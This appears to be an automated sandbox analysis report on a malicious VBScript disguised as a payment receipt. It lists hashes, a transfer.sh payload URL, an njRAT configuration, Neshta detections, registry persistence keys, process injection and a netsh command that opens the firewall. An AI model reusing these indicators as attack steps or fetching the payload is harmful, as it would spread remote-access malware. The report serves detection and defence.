Analysis
-
max time kernel
151s -
max time network
149s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
05-01-2022 08:22
Static task
static1
Behavioral task
behavioral1
Sample
7H2B1N27_PAYMENT_RECEIPT.vbs
Resource
win7-en-20211208
General
-
Target
7H2B1N27_PAYMENT_RECEIPT.vbs
-
Size
2KB
-
MD5
1cf9e3a75322042644a95e4d9eb359bc
-
SHA1
27469cadb09a071e5ee98e6a6492bf1ee16bd170
-
SHA256
7ad872e2d279268cc3107a90337b4beb3be0fc888668d60e6995d64b8955b2e6
-
SHA512
a97d371a84e9ec64821022d64439ac6b04befe0fc2b4231b721450cbc12d70cc3232a53df936a4158e8c5e380c66ef6d1dff66aff4c0b5909652b3dc4f7a41ad
Malware Config
Extracted
https://transfer.sh/get/BKC469/HHHHHHHHHHHHHHHH.txt
Extracted
njrat
1.9
HacKed
Microsoft.Exe
-
reg_key
Microsoft.Exe
Signatures
-
Detect Neshta Payload 3 IoCs
Processes:
resource yara_rule
behavioral2/memory/1324-148-0x0000000000400000-0x000000000041B000-memory.dmp family_neshta
behavioral2/memory/1324-149-0x00000000004080E4-mapping.dmp family_neshta
behavioral2/memory/1324-154-0x0000000000400000-0x000000000041B000-memory.dmp family_neshta
-
Modifies system executable filetype association 2 TTPs 1 IoCs
Processes:
aspnet_compiler.exe
description ioc process
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" aspnet_compiler.exe
-
Neshta
Malware from the Neshta family is designed to infect other files in order to spread itself and cause damage.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exe
flow pid process
9 2824 powershell.exe
-
Modifies Windows Firewall 1 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
aspnet_compiler.exe
description ioc process
Set value (str) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft.Exe = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe\" .." aspnet_compiler.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft.Exe = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe\" .." aspnet_compiler.exe
-
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.exe
description pid process target process
PID 2824 set thread context of 1324 2824 powershell.exe aspnet_compiler.exe
PID 2824 set thread context of 1044 2824 powershell.exe aspnet_compiler.exe
-
Drops file in Program Files directory 53 IoCs
-
Drops file in Windows directory 1 IoCs
Processes:
aspnet_compiler.exe
description ioc process
File opened for modification C:\Windows\svchost.com aspnet_compiler.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
Processes:
aspnet_compiler.exe
description ioc process
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" aspnet_compiler.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exe
pid process
2824 powershell.exe
2824 powershell.exe
2824 powershell.exe
-
Suspicious use of AdjustPrivilegeToken 12 IoCs
Processes:
powershell.exe, aspnet_compiler.exe
description pid process
Token: SeDebugPrivilege 2824 powershell.exe
Token: SeDebugPrivilege 1044 aspnet_compiler.exe
Token: 33 1044 aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege 1044 aspnet_compiler.exe
Token: 33 1044 aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege 1044 aspnet_compiler.exe
Token: 33 1044 aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege 1044 aspnet_compiler.exe
Token: 33 1044 aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege 1044 aspnet_compiler.exe
Token: 33 1044 aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege 1044 aspnet_compiler.exe
-
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
WScript.exe, powershell.exe, aspnet_compiler.exe
description pid process target process
PID 2404 wrote to memory of 2824 2404 WScript.exe powershell.exe
PID 2404 wrote to memory of 2824 2404 WScript.exe powershell.exe
PID 2824 wrote to memory of 1324 2824 powershell.exe aspnet_compiler.exe
PID 2824 wrote to memory of 1324 2824 powershell.exe aspnet_compiler.exe
PID 2824 wrote to memory of 1324 2824 powershell.exe aspnet_compiler.exe
PID 2824 wrote to memory of 1324 2824 powershell.exe aspnet_compiler.exe
PID 2824 wrote to memory of 1324 2824 powershell.exe aspnet_compiler.exe
PID 2824 wrote to memory of 1324 2824 powershell.exe aspnet_compiler.exe
PID 2824 wrote to memory of 1324 2824 powershell.exe aspnet_compiler.exe
PID 2824 wrote to memory of 1324 2824 powershell.exe aspnet_compiler.exe
PID 2824 wrote to memory of 1324 2824 powershell.exe aspnet_compiler.exe
PID 2824 wrote to memory of 1324 2824 powershell.exe aspnet_compiler.exe
PID 2824 wrote to memory of 1324 2824 powershell.exe aspnet_compiler.exe
PID 2824 wrote to memory of 1044 2824 powershell.exe aspnet_compiler.exe
PID 2824 wrote to memory of 1044 2824 powershell.exe aspnet_compiler.exe
PID 2824 wrote to memory of 1044 2824 powershell.exe aspnet_compiler.exe
PID 2824 wrote to memory of 1044 2824 powershell.exe aspnet_compiler.exe
PID 2824 wrote to memory of 1044 2824 powershell.exe aspnet_compiler.exe
PID 2824 wrote to memory of 1044 2824 powershell.exe aspnet_compiler.exe
PID 2824 wrote to memory of 1044 2824 powershell.exe aspnet_compiler.exe
PID 2824 wrote to memory of 1044 2824 powershell.exe aspnet_compiler.exe
PID 1044 wrote to memory of 4040 1044 aspnet_compiler.exe netsh.exe
PID 1044 wrote to memory of 4040 1044 aspnet_compiler.exe netsh.exe
PID 1044 wrote to memory of 4040 1044 aspnet_compiler.exe netsh.exe
Processes
-
C:\Windows\System32\WScript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7H2B1N27_PAYMENT_RECEIPT.vbs" 1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" 3⤵
- Modifies system executable filetype association
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" 3⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE 4⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\ALLUSE~1\Genetor\MICROS~1.EXE
MD5
1e98e92a982af948ee18ee819a2d8ad1
SHA1
6cb0bd87815118351e5e32c50b434079dfba255c
SHA256
235d3f96a78ce2dad584e6eb1a25fc386b3ae5e332c4d3c56f03b0a4978be778
SHA512
6711de2e00462c49852cee03fd8ef720310c4ffa5b3a653c08f2913a6146974f28b8a3b3ff38b3097310852a5aa3b964b77945bcefef3856911eb9acd0e42c6f